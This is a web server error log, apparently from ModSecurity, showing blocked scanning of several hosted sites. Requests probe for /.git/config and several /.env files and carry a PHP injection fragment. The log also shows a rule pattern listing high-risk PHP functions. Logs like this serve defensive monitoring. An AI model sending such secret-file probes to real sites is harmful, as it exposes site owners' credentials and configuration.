[Mon May 11 16:32:12.348249 2026] [security2:error] [pid 1412074:tid 1412084] [client 23.21.175.228:20443] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:dir. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "174"] [id "933160"] [rev "1"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: urlencode(strToHex($p)) found within ARGS:dir: '.urlencode(strToHex($p)).'"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agHobDJnyuKVXoStDha3hwAAAEg"]
[Mon May 11 16:32:12.349251 2026] [security2:error] [pid 1412074:tid 1412084] [client 23.21.175.228:20443] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agHobDJnyuKVXoStDha3hwAAAEg"]
[Mon May 11 16:32:12.441395 2026] [security2:error] [pid 1412074:tid 1412084] [client 23.21.175.228:20443] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: High-Risk PHP Function Call Found"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHobDJnyuKVXoStDha3hwAAAEg"]
[Mon May 11 16:32:35.327294 2026] [authz_core:error] [pid 1411055:tid 1411067] [client 194.163.167.152:53987] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/error_log, referer: binance.com
[Mon May 11 16:32:41.696589 2026] [authz_core:error] [pid 1411201:tid 1411265] [client 194.163.167.152:59883] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/error_log, referer: binance.com
[Mon May 11 16:32:49.071377 2026] [authz_core:error] [pid 1411099:tid 1411119] [client 216.73.216.110:54502] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/vendor/cocur/slugify/tests/Bridge/Nette/error_log
[Mon May 11 16:33:22.268516 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHoskWKUxpmnkK7zHx-7QAAAQs"]
[Mon May 11 16:33:22.268747 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHoskWKUxpmnkK7zHx-7QAAAQs"]
[Mon May 11 16:33:22.269211 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHoskWKUxpmnkK7zHx-7QAAAQs"]
[Mon May 11 16:33:22.430773 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHoskWKUxpmnkK7zHx-7wAAAQs"]
[Mon May 11 16:33:22.431030 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHoskWKUxpmnkK7zHx-7wAAAQs"]
[Mon May 11 16:33:22.431581 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHoskWKUxpmnkK7zHx-7wAAAQs"]
[Mon May 11 16:33:22.590635 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHoskWKUxpmnkK7zHx-8wAAAQs"]
[Mon May 11 16:33:22.590951 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHoskWKUxpmnkK7zHx-8wAAAQs"]
[Mon May 11 16:33:22.591347 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHoskWKUxpmnkK7zHx-8wAAAQs"]
[Mon May 11 16:33:22.747948 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agHoskWKUxpmnkK7zHx-9wAAAQs"]
[Mon May 11 16:33:22.748422 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agHoskWKUxpmnkK7zHx-9wAAAQs"]
[Mon May 11 16:33:22.748657 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agHoskWKUxpmnkK7zHx-9wAAAQs"]
[Mon May 11 16:33:22.748935 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agHoskWKUxpmnkK7zHx-9wAAAQs"]
[Mon May 11 16:33:22.907840 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHoskWKUxpmnkK7zHx--AAAAQs"]
[Mon May 11 16:33:22.908051 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHoskWKUxpmnkK7zHx--AAAAQs"]
[Mon May 11 16:33:22.908340 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHoskWKUxpmnkK7zHx--AAAAQs"]
[Mon May 11 16:33:23.064885 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env"] [unique_id "agHos0WKUxpmnkK7zHx-_AAAAQs"]
[Mon May 11 16:33:23.065308 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env"] [unique_id "agHos0WKUxpmnkK7zHx-_AAAAQs"]
[Mon May 11 16:33:23.065497 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env"] [unique_id "agHos0WKUxpmnkK7zHx-_AAAAQs"]
[Mon May 11 16:33:23.065754 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env"] [unique_id "agHos0WKUxpmnkK7zHx-_AAAAQs"]
[Mon May 11 16:33:23.225313 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.local"] [unique_id "agHos0WKUxpmnkK7zHx-_QAAAQs"]
[Mon May 11 16:33:23.225685 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.local"] [unique_id "agHos0WKUxpmnkK7zHx-_QAAAQs"]
[Mon May 11 16:33:23.225877 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.local"] [unique_id "agHos0WKUxpmnkK7zHx-_QAAAQs"]
[Mon May 11 16:33:23.226116 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.local"] [unique_id "agHos0WKUxpmnkK7zHx-_QAAAQs"]
[Mon May 11 16:33:23.382107 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.production"] [unique_id "agHos0WKUxpmnkK7zHx-_gAAAQs"]
[Mon May 11 16:33:23.382493 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.production"] [unique_id "agHos0WKUxpmnkK7zHx-_gAAAQs"]
[Mon May 11 16:33:23.382683 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.production"] [unique_id "agHos0WKUxpmnkK7zHx-_gAAAQs"]
[Mon May 11 16:33:23.382912 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.production"] [unique_id "agHos0WKUxpmnkK7zHx-_gAAAQs"]
[Mon May 11 16:33:23.540428 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.staging"] [unique_id "agHos0WKUxpmnkK7zHx-_wAAAQs"]
[Mon May 11 16:33:23.540801 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.staging"] [unique_id "agHos0WKUxpmnkK7zHx-_wAAAQs"]
[Mon May 11 16:33:23.540988 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.staging"] [unique_id "agHos0WKUxpmnkK7zHx-_wAAAQs"]
[Mon May 11 16:33:23.541216 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.staging"] [unique_id "agHos0WKUxpmnkK7zHx-_wAAAQs"]
